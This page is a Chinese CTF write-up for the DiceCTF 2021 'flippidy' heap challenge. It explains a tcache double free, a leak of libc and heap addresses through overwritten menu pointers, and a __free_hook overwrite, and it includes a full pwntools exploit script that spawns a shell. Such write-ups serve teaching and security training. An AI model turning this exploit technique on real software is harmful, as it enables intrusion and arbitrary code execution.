热门标签 | HotTags
当前位置:  开发笔记 > 编程语言 > 正文

DiceCTF2021flippidy

检查一下保护机制:只有pie没有开ida看下程序逻辑:main函数:第13行获取一个数字,第14行malloc(8*num)申请一个堆块,这个堆块将被用于保存其它堆块的堆址然后进入

检查一下保护机制:

技术分享图片

只有pie没有开

 ida看下程序逻辑:

main函数:

技术分享图片

第13行获取一个数字,第14行malloc(8*num)申请一个堆块,这个堆块将被用于保存其它堆块的堆址

然后进入while循环,首先是sub_4011c6函数:

技术分享图片

会把数组off_404020里的字符指针指向的字符串依次打印出来,off_404020是这样的:

技术分享图片

那么sub_4011c6()就打印出了一个菜单,菜单里有三个选项  (1)add  (2)flip  (3)exit

先看一下第36行调用的add函数:

 技术分享图片

只能malloc(0x30),意味着申请的堆块的大小是固定的

flip函数是这样的:

技术分享图片

当note个数是奇数个(比如7)的时候,就会发生 free(notes[3]); free(notes[7-3-1])的现象,形成了double free

题目环境是glibc 2.27, tcache double free 比fast bin 要好利用

前面打印菜单的函数,是puts(off_402020[i]),如果能篡改off_402020数组里的数据,就可以任意地址读

看一下off_404020附近的情况:

 技术分享图片

 

拿到libc地址和堆址,方法是利用double free 申请到位于0x404020的chunk,并在0x404040处写上p64(0x404158)

因为此前0x404020处存储的数据是0x404040,意味着它这个chunk的next指针是0x404040,那么下一个tcache chunk将位于0x404040

如果在0x404040写上0x404158,那next的next就是0x404158,此后依次申请,就能拿到位于0x404158的chunk(0x404158上存储着一个很重要的堆址)

脚本如下:


add(0,"/bin/sh\x00")
add(
3,p64(0x404020))
flip()
add(
4,p64(0x404120)+p64(0x404158)+p64(0x4040a4)+p64(0x4040d6)+p64(0x404158))

 

此时 tcache链表是这样的 0x404040 -> 0x404158 -> heap_base+0x260 

按照原定计划依次申请拿到0x404158处的chunk,在这个chunk里写上heap_base+0x50,这会让程序误以为用来存储堆块地址的堆块,在heap_base+0x50处,这个地址位于tcache结构体,后来再申请chunk会把堆址写到tcache结构体上,不过不打紧,小伤不致命

拿到 0x404158后(为保证heap_base+0x260的chunk的next指针指向0x404158,一定要add(0)),tcache链表是这样的 heap_base+0x260 -> 0x404158 -> heap_base +0x50 

然后依次申请就拿到了tcache 结构体,改写它,使得下一个要申请的chunk位于__free_hook,我们在__free_hook上写system函数的地址

脚本如下:


add(5,p64(0))
add(0,p64(heap_base
+0x50))
add(
1,p64(heap_base+0x2b0))
add(
1,p64(heap_base+0x260))
add(
1,p64(0)*2+p64(free_hook))
add(
1,p64(sys))

整个利用脚本是这样的:


#coding:utf-8
from pwn import *
context.log_level
="debug"
sh
=process("./flippidy")
#sh=gdb.debug("./flippidy","b * 0x401378")
#
sh=remote("dicec.tf",31904)
libc=ELF("./lib/libc.so.6")
def add(idx,data):
sh.sendlineafter(
":","1")
sh.sendlineafter(
"Index:",str(idx))
sh.sendlineafter(
"Content: ",data)

def flip():
sh.sendlineafter(
": ","2")
sh.sendlineafter(
"be","7")
add(0,
"/bin/sh\x00")
add(
3,p64(0x404020))
flip()
add(
4,p64(0x404120)+p64(0x404158)+p64(0x4040a4)+p64(0x4040d6)+p64(0x404158))
#一并拿到libc基址和堆址

sh.recvuntil(
"\n\n")
stdout
=u64(sh.recv(6)+b"\x00\x00")
sh.recvuntil(
"\n")
heap_base
=u64((sh.recvuntil(\n)[:-1]).ljust(8,b"\x00"))-0x260
libc_base
=stdout-libc.sym[_IO_2_1_stdout_]
sys
=libc_base+libc.sym[system]
free_hook
=libc_base+libc.sym[__free_hook]
info(hex(libc_base))
info(hex(stdout))
info(hex(heap_base))
add(
5,p64(0))
add(0,p64(heap_base
+0x50)) #绕一圈,目的是跑到tcache结构体
add(1,p64(heap_base+0x2b0))
add(
1,p64(heap_base+0x260))
add(
1,p64(0)*2+p64(free_hook))#好了,拿到了tcache结构体
add(1,p64(sys))
flip()
#pwnlib.gdb.attach(sh)
sh.interactive()

 


推荐阅读
  • 本文介绍如何使用阿里云的fastjson库解析包含时间戳、IP地址和参数等信息的JSON格式文本,并进行数据处理和保存。 ... [详细]
  • Vue 2 中解决页面刷新和按钮跳转导致导航栏样式失效的问题
    本文介绍了如何通过配置路由的 meta 字段,确保 Vue 2 项目中的导航栏在页面刷新或内部按钮跳转时,始终保持正确的 active 样式。具体实现方法包括设置路由的 meta 属性,并在 HTML 模板中动态绑定类名。 ... [详细]
  • 本文探讨了如何通过最小生成树(MST)来计算严格次小生成树。在处理过程中,需特别注意所有边权重相等的情况,以避免错误。我们首先构建最小生成树,然后枚举每条非树边,检查其是否能形成更优的次小生成树。 ... [详细]
  • 在Linux系统中配置并启动ActiveMQ
    本文详细介绍了如何在Linux环境中安装和配置ActiveMQ,包括端口开放及防火墙设置。通过本文,您可以掌握完整的ActiveMQ部署流程,确保其在网络环境中正常运行。 ... [详细]
  • 如何在WPS Office for Mac中调整Word文档的文字排列方向
    本文将详细介绍如何使用最新版WPS Office for Mac调整Word文档中的文字排列方向。通过这些步骤,用户可以轻松更改文本的水平或垂直排列方式,以满足不同的排版需求。 ... [详细]
  • 理解存储器的层次结构有助于程序员优化程序性能,通过合理安排数据在不同层级的存储位置,提升CPU的数据访问速度。本文详细探讨了静态随机访问存储器(SRAM)和动态随机访问存储器(DRAM)的工作原理及其应用场景,并介绍了存储器模块中的数据存取过程及局部性原理。 ... [详细]
  • 几何画板展示电场线与等势面的交互关系
    几何画板是一款功能强大的物理教学软件,具备丰富的绘图和度量工具。它不仅能够模拟物理实验过程,还能通过定量分析揭示物理现象背后的规律,尤其适用于难以在实际实验中展示的内容。本文将介绍如何使用几何画板演示电场线与等势面之间的关系。 ... [详细]
  • 本文介绍如何通过Windows批处理脚本定期检查并重启Java应用程序,确保其持续稳定运行。脚本每30分钟检查一次,并在需要时重启Java程序。同时,它会将任务结果发送到Redis。 ... [详细]
  • MySQL中枚举类型的所有可能值获取方法
    本文介绍了一种在MySQL数据库中查询枚举(ENUM)类型字段所有可能取值的方法,帮助开发者更好地理解和利用这一数据类型。 ... [详细]
  • 本文介绍如何在应用程序中使用文本输入框创建密码输入框,并通过设置掩码来隐藏用户输入的内容。我们将详细解释代码实现,并提供专业的补充说明。 ... [详细]
  • 本文介绍如何通过SQL查询从JDE(JD Edwards)系统中提取所有字典数据,涵盖关键表的关联和字段选择。具体包括F0004和F0005系列表的数据提取方法。 ... [详细]
  • 本文详细介绍了如何通过命令行启动MySQL服务,包括打开命令提示符窗口、进入MySQL的bin目录、输入正确的连接命令以及注意事项。文中还提供了更多相关命令的资源链接。 ... [详细]
  • 本文介绍如何使用 NSTimer 实现倒计时功能,详细讲解了初始化方法、参数配置以及具体实现步骤。通过示例代码展示如何创建和管理定时器,确保在指定时间间隔内执行特定任务。 ... [详细]
  • 本文介绍了在Windows环境下使用pydoc工具的方法,并详细解释了如何通过命令行和浏览器查看Python内置函数的文档。此外,还提供了关于raw_input和open函数的具体用法和功能说明。 ... [详细]
  • MATLAB实现n条线段交点计算
    本文介绍了一种通过逐对比较线段来求解交点的简单算法。此外,还提到了一种基于排序的方法,但该方法较为复杂,尚未完全理解。文中详细描述了如何根据线段端点求交点,并判断交点是否在线段上。 ... [详细]
author-avatar
Yang家联1
这个家伙很懒,什么也没留下!
PHP1.CN | 中国最专业的PHP中文社区 | DevBox开发工具箱 | json解析格式化 |PHP资讯 | PHP教程 | 数据库技术 | 服务器技术 | 前端开发技术 | PHP框架 | 开发工具 | 在线工具
Copyright © 1998 - 2020 PHP1.CN. All Rights Reserved | 京公网安备 11010802041100号 | 京ICP备19059560号-4 | PHP1.CN 第一PHP社区 版权所有